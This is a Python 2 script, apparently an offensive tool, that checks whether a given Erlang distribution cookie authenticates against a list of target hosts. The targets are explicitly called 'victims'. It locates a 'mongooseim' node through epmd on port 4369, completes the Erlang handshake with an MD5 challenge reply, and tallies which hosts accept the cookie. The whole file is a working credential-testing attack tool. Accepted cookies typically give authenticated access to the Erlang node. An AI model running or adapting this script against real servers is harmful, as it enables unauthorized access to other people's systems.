1
#!/usr/bin/env python2
2

3
from struct import pack, unpack
4
from socket import socket, AF_INET, SOCK_STREAM, SHUT_RDWR, timeout, error
5
from hashlib import md5
6
from random import choice, shuffle
7
from string import ascii_uppercase
8
import sys
9
import argparse
10
from time import sleep
11
import re
12

13

14
def rand_id(n=6):
15
  return ''.join([choice(ascii_uppercase) for c in range(n)]) + '@mars'
16

17
parser = argparse.ArgumentParser(description='Tests every cookie value in dictionary against victim, to successfully complete authentication.')
18

19
parser.add_argument('--refresh-with-epmd', action='store_true', help='Disable epmd check', default=False)
20
parser.add_argument('cookie', action='store', type=str, help='Value to cookie to test against')
21
parser.add_argument('targets', action='store', type=str, help='List of host:port to reach')
22
parser.add_argument('--delay', type=float, default=0.0, help='Amount of seconds (float) to sleep between attempts')
23

24
def send_name(name):
25
  return pack('!HcHI', 7 + len(name), 'n', 5, 0x7499c) + name
26

27
def send_challenge_reply(cookie, challenge):
28
  m = md5()
29
  m.update(cookie)
30
  m.update(challenge)
31
  response = m.digest()
32
  return pack('!HcI', len(response)+5, 'r', 0) + response
33

34

35

36
def refresh_erldp_port(host):
37
  sock = socket(AF_INET, SOCK_STREAM)
38

39
  sock.settimeout(20.0)
40

41
  sock.connect((host, 4369))
42

43
  sock.sendall('\x00\x01\x6e')
44
  data = sock.recv(4096)
45
  sock.close()
46

47
  for m in re.finditer(r'name (.*?) at port (\d+)', data):
48
    host = m.group(1)
49
    port = int(m.group(2))
50
    if host == 'mongooseim': return port
51

52

53

54
def does_cookie_authenticate(host, port):
55
  name = rand_id(6)
56

57
  sock = socket(AF_INET, SOCK_STREAM, 0)
58
  assert(sock)
59

60
  sock.settimeout(20.0)
61

62
  sock.connect((host, port))
63

64
  sock.sendall(send_name(name))
65

66
  data = sock.recv(5)
67
  assert(data == '\x00\x03\x73\x6f\x6b')
68

69
  data = sock.recv(4096)
70

71
  (length, tag, version, flags, challenge) = unpack('!HcHII', data[:13])
72
  challenge = '%u' % challenge
73

74
  sock.sendall(send_challenge_reply(args.cookie, challenge))
75

76
  data = sock.recv(3)
77
  if len(data) == 0:
78
    sock.close()
79
    return False
80
  else:
81
    assert(data == '\x00\x11\x61')
82
    digest = sock.recv(16)
83
    assert(len(digest) == 16)
84
    sock.close()
85

86
    return True
87

88
args = parser.parse_args()
89

90

91

92
f = open(args.targets, 'rb')
93
targets = [l.rstrip('\n') for l in f.readlines()]
94
shuffle(targets)
95
n_targets = len(targets)
96

97
n_no_epmd = 0
98
n_not_accessible = 0
99
n_not_challenging = 0
100
n_valid_cookie = 0
101
n_wrong_cookie = 0
102

103
def prRed(skk): print("\033[91m {}\033[00m" .format(skk)) 
104
def prGreen(skk): print("\033[92m {}\033[00m" .format(skk)) 
105
def prYellow(skk): print("\033[93m {}\033[00m" .format(skk))
106

107
for i in range(n_targets):
108
  (host, port) = targets[i].split(':')
109
  port = int(port)
110

111
  if args.refresh_with_epmd:
112
    try:
113
      port = refresh_erldp_port(host)
114
      if port is None: raise error()
115
    except error:
116
      n_no_epmd += 1
117
      prRed('%s\t\t\tno epmd' % (host))
118
      continue
119
  else:
120
    pass
121

122
  try:
123
    if does_cookie_authenticate(host, port):
124
      n_valid_cookie += 1
125
      prGreen('%s:%d\t\tvalid' % (host, port))
126
    else:
127
      n_wrong_cookie += 1
128
      prYellow('%s:%d\t\tinvalid' % (host, port))
129
  except error:
130
    n_not_accessible += 1
131
    prRed('%s:%d\t\tnot accessible' % (host, port))
132
  except timeout:
133
    n_not_challenging += 1
134
    prRed('%s:%d\t\tnot challenging ' % (host, port))
135

136

137
print('total victims %d valid %d no epmd %d invalid %d not accessible %d not challenging %d' % (n_targets, n_valid_cookie, n_no_epmd, n_wrong_cookie, n_not_accessible, n_not_challenging))
138

139

140